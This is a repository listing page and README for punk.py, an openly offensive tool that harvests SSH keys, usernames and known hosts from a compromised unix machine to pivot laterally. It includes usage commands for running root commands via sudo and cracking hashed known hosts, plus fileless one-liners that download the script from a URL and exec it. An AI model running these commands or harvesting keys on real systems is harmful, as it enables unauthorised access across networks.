r3vn / Punk.py

Licence: gpl-3.0
unix SSH post-exploitation 1337 tool

Programming Languages

python

Projects that are alternatives of or similar to Punk.py

Bifrost
Bifrost C2. Open-source post-exploitation using Discord API
Stars: ✭ 37 (-65.42%)
Mutual labels:  post-exploitation, offensive-security, pentest-tool
Oscp Pentest Methodologies
Assorted practical study materials for OSCP exam preparation / penetration testing
Stars: ✭ 166 (+55.14%)
Mutual labels:  penetration-testing, pentest-tool, post-exploitation
Badkarma
network reconnaissance toolkit
Stars: ✭ 353 (+229.91%)
Mutual labels:  penetration-testing, pentest-tool, offensive-security
ligolo-ng
An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.
Stars: ✭ 418 (+290.65%)
Mutual labels:  post-exploitation, offensive-security, pentest-tool
Blackmamba
C2/post-exploitation framework
Stars: ✭ 544 (+408.41%)
Mutual labels:  pentest-tool, post-exploitation, offensive-security
Passhunt
Passhunt is a simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords.
Stars: ✭ 961 (+798.13%)
Mutual labels:  penetration-testing, pentest-tool
Eyes
👀 🖥️ Golang rewrite of eyes.sh. Lets you perform domain/IP address information gathering. Wasn't it esr who said "With enough eyeballs, all your IP info are belong to us?" 🔍 🕵️
Stars: ✭ 38 (-64.49%)
Mutual labels:  penetration-testing, pentest-tool
Fuxi
Penetration Testing Platform
Stars: ✭ 1,103 (+930.84%)
Mutual labels:  penetration-testing, pentest-tool
One Lin3r
Gives you one-liners that aid in penetration testing operations, privilege escalation and more
Stars: ✭ 1,259 (+1076.64%)
Mutual labels:  penetration-testing, pentest-tool
Hacker Roadmap
📌 Your beginner pen-testing start guide. A guide for amateur pen testers and a collection of hacking tools, resources and references to practice ethical hacking and web security.
Stars: ✭ 7,752 (+7144.86%)
Mutual labels:  penetration-testing, post-exploitation
Gtfonow
Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries
Stars: ✭ 68 (-36.45%)
Mutual labels:  unix, post-exploitation
Thecollective
The Collective. A repo for a collection of red-team projects found mostly on Github.
Stars: ✭ 85 (-20.56%)
Mutual labels:  penetration-testing, offensive-security
Babysploit
👶 BabySploit Beginner Pentesting Toolkit/Framework Written in Python 🐍
Stars: ✭ 883 (+725.23%)
Mutual labels:  penetration-testing, pentest-tool
Pwncat
pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
Stars: ✭ 904 (+744.86%)
Mutual labels:  penetration-testing, pentest-tool
Intersect 2.5
Post-Exploitation Framework
Stars: ✭ 59 (-44.86%)
Mutual labels:  penetration-testing, post-exploitation
Awesome Oscp
A curated list of awesome OSCP resources
Stars: ✭ 804 (+651.4%)
Mutual labels:  penetration-testing, offensive-security
Penetration Testing Cheat Sheet
Work in progress...
Stars: ✭ 69 (-35.51%)
Mutual labels:  penetration-testing, offensive-security
Pentest Notes
Collection of Pentest Notes and Cheatsheets from a lot of repos (SofianeHamlaoui,dostoevsky,mantvydasb,adon90,BriskSec)
Stars: ✭ 89 (-16.82%)
Mutual labels:  penetration-testing, offensive-security
Atomic Red Team Intelligence C2
ARTi-C2 is a post-exploitation framework used to execute Atomic Red Team test cases with rapid payload deployment and execution capabilities via .NET's DLR.
Stars: ✭ 87 (-18.69%)
Mutual labels:  post-exploitation, offensive-security
Eyes.sh
Lets you perform domain/IP information gathering... in BASH! Wasn't it esr who said "With enough eyeballs, all your IP info are belong to us?"
Stars: ✭ 89 (-16.82%)
Mutual labels:  penetration-testing, pentest-tool

punk.py

unix SSH post-exploitation 1337 tool

how it works

punk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collects usernames, SSH keys and known hosts from a unix system, then tries to connect via SSH to all the combinations found. punk.py is written to work on both standard python2 and python3 interpreters.

examples

standard execution:

 ~$ ./punk.py

skip passwd checks and use a custom home path:

 ~$ ./punk.py --no-passwd --home /home/ldapusers/

execute commands with sudo:

 ~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"

cracking ssh hashed known hosts:

 ~$ ./punk.py --crack 192.168.0.0/24

python2 one-liner fileless ( with --no-passwd parameter ):

 ~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

python3 one-liner fileless:

 ~$ python3 -c "import requests;exec(requests.get('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').text)"

TODO

  • improve private keys hunting including dsa keys
  • Recursion
  • SSH keys with password bruteforce